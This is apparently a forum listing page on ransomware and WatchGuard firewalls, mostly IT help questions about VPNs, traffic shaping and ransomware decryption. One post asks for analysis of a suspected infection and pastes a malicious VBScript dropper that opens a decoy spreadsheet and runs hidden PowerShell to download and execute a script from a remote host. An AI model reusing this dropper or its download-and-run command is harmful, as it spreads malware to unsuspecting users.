Ransomware

143

Solutions

366

Contributors

Ransomware is malicious software, designed to block data access in order to extort money. As a form of malware, ransomware is most often used to infiltrate devices through infected emails or links that, in turn, recognize and take advantage of vulnerabilities in the operating system and installed third-party software.

Share tech news, updates, or what's on your mind.

Sign up to Post

Customer has a watchguard T10 firebox firewall for a pos system.  The POS server connects directly to the trusted network port. no other computers connect to that network.  

Customer wants to setup an access point for wifi.  The watchguard has a 3rd port.  I want to activate it as a second network and allow wireless devices to access the internet.  

The watchguard firewall does not have built in wifi.  We purchased an access point that we plan to connect to the 3rd port.

This is a restaurant, there are no office pc's or network printers.

Need suggestions on policy's, the device has contenfilter subscriptions.  I want to enforce them on the 3rd port too if possible.
0
Introducing the "443 Security Simplified" Podcast
LVL 1
Introducing the "443 Security Simplified" Podcast

This new podcast puts you inside the minds of leading white-hat hackers and security researchers. Hosts Marc Laliberte and Corey Nachreiner turn complex security concepts into easily understood and actionable insights on the latest cyber security headlines and trends.

We believe a client has been hacked but can't determine what the vb script is doing to the data, it doesn't look like ransomware.
can you help point us in a direction to what degree this hack could be.

below is the vbscript and a picture of a folder it has been found in. you will see that actual excel doc has been hidden and a fake excel doc in it's place. it looks like when the fake excel doc is run, it opens up the vbscript and the hidden excel doc

VBscript
Set fso = CreateObject("Scripting.FileSystemObject")
Set shl = CreateObject("WScript.Shell")
Set shp = CreateObject("WScript.Shell")
path=shl.ExpandEnvironmentStrings("%APPDATA%")+"\"+GetUUID(".")
exists = fso.FolderExists(path)
Set objFile = fso.GetFile(Wscript.ScriptFullName)
rr = fso.GetParentFolderName(objFile)+"\Project 8192 LNG STS System Certification Log.xlsx"
if (exists) then
shl.Run("explorer.exe "+rr+"")
Else
shl.Run("explorer.exe "+rr+"")
shp.Run "powershell.exe  -windowstyle hidden -executionpolicy bypass -command iex((nEw-ObJect ('NEt.WeBclient')).('DowNLoAdStrInG').invoKe(('https://cflfuppn.eu/sload/2.0/netF.ps1')))",0,True
Set shp = Nothing
end if
Function GetUUID(strComputer)
Dim objWmi, colItems, objItem, strUUID, blnValidUUID
Set objWmi = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
Set colItems = objWmi.ExecQuery("Select * from Win32_ComputerSystemProduct")
strUUID = ""
blnValidUUID = False
For Each objItem in colItems
strUUID = objItem.UUID
If Not …
0
How to block RFC 1918 and create object-groups and use that object-groups to block any udp traffic inbound to the external interface on a WatchGuard Firebox (M200)?
0
We have a Watchguard M200 firewall that we would like to limit inbound/outbound bandwidth to 20Mbps on our External (WAN) interface. Our ISP allows for 40Mbps total bandwidth. I've gone into Traffic Management and changed the interface to limit bandwidth to 20Mbps but this only seems to apply to upstream outbound traffic. Inbound traffic is still coming in at the fulll 40Mbps. Is it possible to also limit inbound traffic to 20Mbps?

Thank you
0
Hi!
I´m trying to use programm by James-Gourley to decrypt a 1.4.0.0 version of Cryakl  . Some files are decrypted correctly, and other files are not decrypted with  "encryption signature mismatch" message. Help me please. Sample files https://dropmefiles.com/769Q7   More examples of unencrypted files https://dropmefiles.com/CZ7xH
0
need help with decrypt files after Cryakl 1.5.1/
encrypted and original file attach
0
EE,

We have been attacked by the "rapid' ransomware virus - most of our key information assets have been locked, all with the extension of ".rapid" on each file.
> The worst part is that they locked all of our backup files as well - we are stuck.

I am looking for some suggestions on how to deal with this... Yep, first time for me and my company.

Should we pay or should we fight...

Rojosho
2
I have an urgent issue and can't seem to find an answer. 

The client has server 2012 A software VPN is setup.  Which is no longer working. 
server had GDATA installed which I removed and reinstalled webroot. Then restarted the server.

 Since this I have not been able to get the VPN working again. I have tried running removal tools for Webroot, Gdata and disabled the windows firewall, however, no success at all. Still no VPN access. 

Does anyone have any suggestions ? 

Error is

The network connection between your computer and the VPN server could not be established because the remote server is not responding. This could be because one of the network devices (e.g, firewalls, NAT, routers, etc) between your computer and the remote server is not configured to allow VPN connections. Please contact your Administrator or your service provider to determine which device may be causing the problem.
0
I am having an issue accessing a secure ftp web site from a network.  The network uses a watchguard xtm 25 appliance and then runs Server 2008 R2 as the network server.  The workstations are all Windows 7 Pro.

The URL is https://oebsftp.ontarioenergyboard.ca.  This should bring me to a log in page, but instead the following message

The message from IE 11 is as follows:

This page can’t be displayed


Turn on TLS 1.0, TLS 1.1, and TLS 1.2 in Advanced settings and try connecting to https://oebsftp.ontarioenergyboard.ca  again. If this error persists, it is possible that this site uses an unsupported protocol or cipher suite such as RC4 (link for the details), which is not considered secure. Please contact your site administrator.

Fire fox give the following:
Secure Connection Failed

The connection to oebsftp.ontarioenergyboard.ca was interrupted while the page was loading.

    The page you are trying to view cannot be shown because the authenticity of the received data could not be verified.
    Please contact the website owners to inform them of this problem.
Often the Ontario energy board upload sites are designed for IE only.

I do not see anything in the Watchguard appliance but may be overlooking something.

The server uses SEP 14.0 for both anti-virus and Firewall

As a separate issue, email using Outlook 2013 cannot use ssl either
0
HI James ..... I´m back here .... Sadly
I've another computer infected with Fairytail .... I think it´s the same version that i've cleaned earlier.
I´ve Just downloaded your decryptor but i think something went wrong with it.
The earlier version worked fine with me .... but this one seems to give me some trouble. I used it in 3 different PCs' and i received the same error. All of them were running Windows 10 64 bits.
I have a clean file and the same file encrypted to use in the decryptor.
But as soon i select the encrypted file, i receive the error i attach
0
Cloud Class® Course: Ruby Fundamentals
LVL 12
Cloud Class® Course: Ruby Fundamentals

This course will introduce you to Ruby, as well as teach you about classes, methods, variables, data structures, loops, enumerable methods, and finishing touches.

We have a WatchGuard M300. We currently have an internet connection that is too small for our needs. Our issue is the upload speed is capped at 20Mbps. With the M300 can we add a second internet connection and have our internet traffic divided evenly between these two connections?
0
I have files infected with .rapid extension... need a solution.
0
We have several locations. Each location has several DNS servers, all replicating to each other. In DNS we have several Conditional Forwarders. At all locations except one I can ping and RDP into any of the servers in the Conditional Forwarders list. However in one of the locations I am unable to ping to any of the Conditional Forwarder IPs. All locations are connected using a Watchguard firewall using a VPN. When I do a tracert from the location that is unable to get to any of the Conditional Forwarder locations, it goes to the local DNS server, then out to local ISP DNS server. I have been reading and searching for articles that might help however I am unable to find a solution.
0
Hi All

This is not a question as such im looking for information ideas on how i can pass VLAN's across a ipsec VPN tunnel

Ive got 16 VLANS that is hosted at one site located a few hundred kilometers away from my secondary site and i want to be able to push the vlans from the main site to the secondary site and then be able to distriube those via a switch at the remote site

The sites currently will be connected via either Sonicwalls or WatchGuard UTM Appliances

Any help or suggestions on this would be greatly appreciated
0
Dear All,

Friend of mines company server got hijacked by embassy@scryptmail.com using  Disk-crypt after much negotiation we got the codes (reduced prices £4000 to £300) so the laptops have all been decrypted; The sever dell using raid 1 mirror Perc S300 controller hasn’t been straight forward; eventually worked out how I had to boot from a alternate SSD with driver an SMB server 2011 etc, I’ve now decrypted the drives even though the server boot BSODS (sort later) but does anyone know how to remove the demand at boot from the MBR please for the password.

Regards
D
0
Hello Experts,

I have got XTM 26 series watchguard Firewall in the company. We are now in the phase of upgrading internet bandwidth from 20 Mbps to 100 Mbps.  According to service provider, I have to setup firewall for traffic shaping but I am not sure watchguard support it or not?

Parameters to configure on firewall are; Shaping Rate, Shaping burst, Extended burst.


I do not want to go with other option of adding a router before the firewall, as it may stops all applications running in branch office.

Can anybody help me with?
0
Watchguard to Draytek site to site VPN - 2 tunnels required.

WG side has local IP of 192.168.1.1/24 and this needs linking to the draytek which has 2 LAN 10.0.0.1/24 and 192.168.100.1/24

I need a tunnel for both

Now i can set this up with one tunnel no issue. but cant see anywhere to add a second tunnel on the draytek end. Ive herd GRE might be the answer my question but havnt used this before.

How do i add a second tunnel. I have also tried a second VPN with the other tunnel but this causes both VPNs to alternate and not work correctly. any help or questions welcome
0
i currently have a watchguard firebox with UTM and using vmware.
im currently upgrading the environment to the latest vmware and nsx.
is it recommended to eliminate the watchguard and ONLY use NSX?
0
Watchguard mobile VPN stops receiving data whenever I reboot my laptop. It requires me to uninstall and install again to make it working. Can some please suggest me the cause of the issue.
1
Cloud Class® Course: CompTIA Cloud+
LVL 12
Cloud Class® Course: CompTIA Cloud+

The CompTIA Cloud+ Basic training course will teach you about cloud concepts and models, data storage, networking, and network infrastructure.

I have a wireless envorment with:

Server 2012 R2 running the NPS service for RADIUS authentication to the AD
Ubiquiti UniFi APs that are set to forward auth to the RADIUS NPS server

Now I have that setup, and it works, and authenticates the users AD login, and connects to the network just fine, the issue I have, comes after that, when the user is not authenticated through the single sign on through RADIUS for the WatchGuard firewall. I have followed what little information WatchGuard has on this, but most of their information points to MSDN pages, that get me no where.  I understand that the WatchGuard needs to receive accounting packets with information from the NPS server, but it doesn't seem to be getting them, as the firewall still tries to route users to authenticate through the web portal.

Not sure where to go from here in order tell which system to send to what and where, and how.
0
At NY Data Center, and UK and US Offices the IP addresses accessing in and being accessed out.


Objective is to identify suspicious / unauthorized access or data transfer .
0
We are looking for a software that we can install  on a server that contains critical information that detects and prevents ransomware aggressively.  Something that we can literally halt it in its tracks and lock down any ports etc open areas in comes in.  

Thanks
0

Ransomware

143

Solutions

366

Contributors

Ransomware is malicious software, designed to block data access in order to extort money. As a form of malware, ransomware is most often used to infiltrate devices through infected emails or links that, in turn, recognize and take advantage of vulnerabilities in the operating system and installed third-party software.